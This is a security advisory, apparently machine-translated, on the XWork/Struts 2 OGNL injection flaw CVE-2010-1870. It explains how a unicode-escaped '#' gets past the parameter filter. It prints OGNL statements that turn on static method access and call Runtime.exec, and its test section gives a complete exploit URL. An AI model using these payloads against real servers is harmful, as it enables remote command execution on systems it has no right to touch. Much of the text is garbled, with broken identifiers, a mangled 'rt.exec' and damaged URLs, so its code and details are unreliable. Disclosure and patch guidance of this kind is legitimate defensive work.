Affected Systems:
OpenSymphony XWork <2.2.0
Apache Group Struts <2.2.0
Description:Cve id:
CVE-2010-1870
XWork is a command mode framework that supports Struts 2 and other applications.
XWork has a vulnerability in processing user request parameter data. Remote attackers can exploit this vulnerability to execute arbitrary commands on the system.
In Struts2, The WebWork framework uses XWork to perform operations and calls based on HTTP parameter names. Each HTTP parameter name is processed as an OGNL (Object graphics Navigation language) statement, while OGNL will:
User. address. city = Bishkek & user [favoriteDrink] = kumys
Convert:
Action. getUser (). getAddress (). setCity ("Bishkek ")
Action. getUser (). setFavoriteDrink ("kumys ")
This is implemented through ParametersInterceptor and ValueStack. setValue () is called using the HTTP parameter provided by the user ().
In addition to obtaining and setting properties, OGNL also supports other functions:
* Method call: foo ()
* Static call: @ java. lang. System @ exit (1)
* Build function call: new MyClass ()
* Process the context variable: # foo = new MyClass ()
Because the HTTP parameter is named OGNL, XWork uses the following two variable protection methods to prevent attackers from calling arbitrary methods through HTTP parameters:
* OgnlContext attribute xwork. MethodAccessor. denyMethodExecution (set to true by default)
* SecurityMemberAccess private field allowStaticMethodAccess (set to false by default)
To facilitate developers to access a variety of common objects, XWork provides some predefined context variables:
* # Application
* # Session
* # Request
* # Parameters
* # Attr
* # Context
* # _ MemberAccess
* # Root
* # This
* # _ TypeResolver
* # _ ClassResolver
* # _ TraceEvaluations
* # _ LastEvaluation
* # _ KeepLastEvaluation
These variables represent various Server objects. To prevent tampering with server objects, the ParametersInterceptor of XWork does not allow the parameter name to contain the "#" character. However, if the Java unicode string is used to represent u0023, attackers can bypass the protection, modify the value that protects Java execution:
# _ MemberAccess [allowStaticMethodAccess] = true
# Foo = new java. lang. Boolean ("false ")
# Context [xwork. MethodAccessor. denyMethodExecution] = # foo
# Rt = @ java. lang. Runtime @ getRuntime ()
Export rt.exe c (mkdir/tmp/PWNED)
<* Source: Meder Kydyraliev (
Bugtraq@web.areopag.net)
Link:
Http://secunia.com/advisories/32495/
Http://www.exploit-db.com/exploits/14360/
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http: // mydomain/MyStruts. action? (U0023_memberAccess [allowStaticMethodAccess]) (meh) = true & (aaa) (u0023context [xwork. methodAccessor. denyMethodExecution] u003du0023foo) (u0023foou003dnew % 20java. lang. boolean ("false") & (asdf) (u0023rt. exit (1) (u0023rtu003d@java.lang.Runtime @ getRuntime () = 1
Suggestion:Vendor patch:
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Vc? View = revision & revision = 956389 "target = _ blank>
Http://svn.apache.org/viewvc? View = revision & revision = 956389